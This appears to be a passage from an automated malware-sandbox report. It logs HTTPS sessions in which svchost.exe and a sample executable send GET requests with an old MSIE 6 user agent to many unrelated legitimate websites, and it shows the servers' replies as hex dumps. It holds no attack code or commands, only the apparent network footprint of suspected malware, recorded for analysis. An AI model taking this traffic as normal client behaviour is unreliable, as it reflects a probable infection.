                                                                                                                                                                                                                                                                          Content-Language: en
                                                                                                                                                                                                                                                                          Last-Modified: Wed, 05 Jul 2023 05:55:47 GMT
                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                          Vary: Accept-Language
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IBA8sX0h%2FcLrjLOzJjK5duS4wUvZd57%2FWhn93Gg37L8lhMntdxrhp5%2B5xmCrfEmdRoi7tJpsJVVn6U9X4wGREJpdz8Pu6gI64kNPVR3yEt%2B4R1Q4ZMIcrOZkhX1gyVnI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6dc38c3b9bb2-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5774INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5774INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          32192.168.2.66097635.214.171.193443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5449OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: flamingorecordings.com
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5476INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:37 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 75193
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          ETag: "6459edff-125b9"
                                                                                                                                                                                                                                                                          Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                                                                          X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5476INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="cache-control" content="no-store,max-age=0" /> <meta name="robots" content="noindex"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5492INData Raw: 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 35 39 2e 30 33 31 20 31 39 35 2e 32 36 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 36 33 2e 32 35 38 20 31 39 38 2e 39 34 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 34 37 2e 32 32 35 20 31 39 35 2e 32 36 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 35 31 2e 34 35 32 20 31 39 38 2e 39 34 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 33 35 2e 34 31 39 20 31 39 35 2e
                                                                                                                                                                                                                                                                          Data Ascii: fill="#fff"/><polygon points="197.11 59.031 195.268 61.144 197.11 63.258 198.948 61.144 197.11 59.031" fill="#fff"/><polygon points="197.11 47.225 195.268 49.338 197.11 51.452 198.948 49.338 197.11 47.225" fill="#fff"/><polygon points="197.11 35.419 195.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5508INData Raw: 20 31 31 33 2e 31 35 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 36 33 2e 32 35 38 20 31 31 36 2e 38 33 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 20 31 31 33 2e 31 35 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 35 31 2e 34 35 32 20 31 31 36 2e 38 33 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 33 35 2e 34 31 39 20 31 31 33 2e 31 35 34 20 33 37 2e 35 33 32 20 31 31 34 2e 39 39 36 20 33 39 2e 36 34 36 20 31 31 36 2e 38 33 34 20 33 37 2e 35
                                                                                                                                                                                                                                                                          Data Ascii: 113.154 61.144 114.996 63.258 116.834 61.144 114.996 59.031" fill="#fff"/><polygon points="114.996 47.225 113.154 49.338 114.996 51.452 116.834 49.338 114.996 47.225" fill="#fff"/><polygon points="114.996 35.419 113.154 37.532 114.996 39.646 116.834 37.5
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5524INData Raw: 34 2e 39 32 31 20 32 34 30 2e 30 34 32 20 31 34 32 2e 38 30 38 20 32 33 38 2e 32 30 33 20 31 34 30 2e 36 39 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 37 2e 35 36 35 20 32 35 30 2e 33 31 36 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 33 2e 33 33 37 20 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 38 2e 34 37 38 20 32 31 35 2e 37 35 39 20 32 35 30 2e 33 31 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 31 2e 35 33 31 20 32 34 36 2e 36 33 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 35
                                                                                                                                                                                                                                                                          Data Ascii: 4.921 240.042 142.808 238.203 140.694" fill="#fff"/><polygon points="246.638 225.451 248.478 227.565 250.316 225.451 248.478 223.337 246.638 225.451" fill="#fff"/><polygon points="248.478 215.759 250.316 213.645 248.478 211.531 246.636 213.645 248.478 215
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5540INData Raw: 38 20 39 34 2e 34 34 38 20 32 30 33 2e 39 35 32 20 39 36 2e 32 38 36 20 32 30 31 2e 38 33 38 20 39 34 2e 34 34 38 20 31 39 39 2e 37 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 20 39 32 2e 36 31 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 39 32 2e 31 34 36 20 39 36 2e 32 38 36 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33 20 39 32 2e 36 31 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 38 30 2e 33 34 20 39 36 2e 32 38 36 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33
                                                                                                                                                                                                                                                                          Data Ascii: 8 94.448 203.952 96.286 201.838 94.448 199.725" fill="#fff"/><polygon points="94.448 187.919 92.61 190.032 94.448 192.146 96.286 190.032 94.448 187.919" fill="#fff"/><polygon points="94.448 176.113 92.61 178.226 94.448 180.34 96.286 178.226 94.448 176.113


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          33192.168.2.6610485.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5678OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5773INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:37 GMT
                                                                                                                                                                                                                                                                          Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                          Last-Modified: Fri, 30 Jun 2023 05:41:10 GMT
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Content-Length: 53069
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5786INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5802INData Raw: 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65 73 73 74 65 63 68 6e 69 6b 2f 76 65 72 73 63 68 6c 69 65 73 73 6d 61 73 63 68 69 6e 65 6e 22 20 74 69 74 6c 65 3d 22 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                          Data Ascii: item layout-0 "> <a href="/verschliesstechnik/verschliessmaschinen" title="Verschliemaschinen"> Verschliemaschinen </a>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5818INData Raw: 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 6c 61 6e 64 73 63 61 70 65 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 75 73 65 72 5f 75 70 6c 6f 61 64 2f 4e 61 63 68 68 61 6c 74 69 67 6b 65 69 74 2f 63 73 6d 5f 6d 65 74 61 6c 5f 72 65 63 79 63 6c 65 73 5f 66 6f 72 65 76 65 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 70 6f 72 74 72 61 69 74 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65
                                                                                                                                                                                                                                                                          Data Ascii: r.jpg"><source media="(max-width: 767px) and (orientation:landscape)" srcset="/fileadmin/user_upload/Nachhaltigkeit/csm_metal_recycles_forever.jpg"><source media="(max-width: 991px) and (orientation:portrait)" srcset="/file
                                                                                                                                                                                                                                                                          2023-07-05 06:07:37 UTC5834INData Raw: 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 70 6f 72 74 72 61 69 74 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64
                                                                                                                                                                                                                                                                          Data Ascii: srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><source media="(max-width: 991px) and (orientation:portrait)" srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><source media="(max-width: 991px) and


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          34192.168.2.66115394.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:38 UTC5838OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: diamir.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:38 UTC5838INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:38 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 162
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                          2023-07-05 06:07:38 UTC5838INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          35192.168.2.661457188.114.96.7443C:\Users\user\Desktop\nhVJ8J5qOt.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:38 UTC5839OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: hyab.se
                                                                                                                                                                                                                                                                          2023-07-05 06:07:38 UTC5840INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:38 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Location: https://hyab.com
                                                                                                                                                                                                                                                                          Cache-Control: max-age=600
                                                                                                                                                                                                                                                                          Expires: Wed, 05 Jul 2023 06:17:38 GMT
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Jzyb7cGRUmErXgUaMORyf2ckmroMLaL7ekgLgc0cYPEa57cAbFsQoIbgiwfpJ8WPPA9W5fKatxE4oLZf4lyuqZOYl2c0A71fTP5YIVTkf%2Fy3BWKIKMLe%2FaSp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6dc80deb190f-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:07:38 UTC5840INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:38 UTC5840INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          36192.168.2.66148994.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:38 UTC5839OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: www.diamir.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:38 UTC5839INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:38 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                          2023-07-05 06:07:38 UTC5839INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          37192.168.2.662153172.67.193.133443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:38 UTC5840OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: hyab.com
                                                                                                                                                                                                                                                                          Cookie: PHPSESSID=c5021e3740c078040485bf529df4f43e
                                                                                                                                                                                                                                                                          2023-07-05 06:07:38 UTC5841INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:38 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=64ghdoCjX%2BCnYS7A7bC3yZORcl1vaPiWBKt94hZmE5hGfpsQaa7CAo9a%2BbhdQaW0PS94OQOHiNJoUXNIvOjYuFx9rQCYylAgCveruTeaCG8i%2F8vaJDe8BhjC9g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6dca8c4e1bcf-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:07:38 UTC5841INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          38192.168.2.662542185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:38 UTC5841OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: techtrans.de
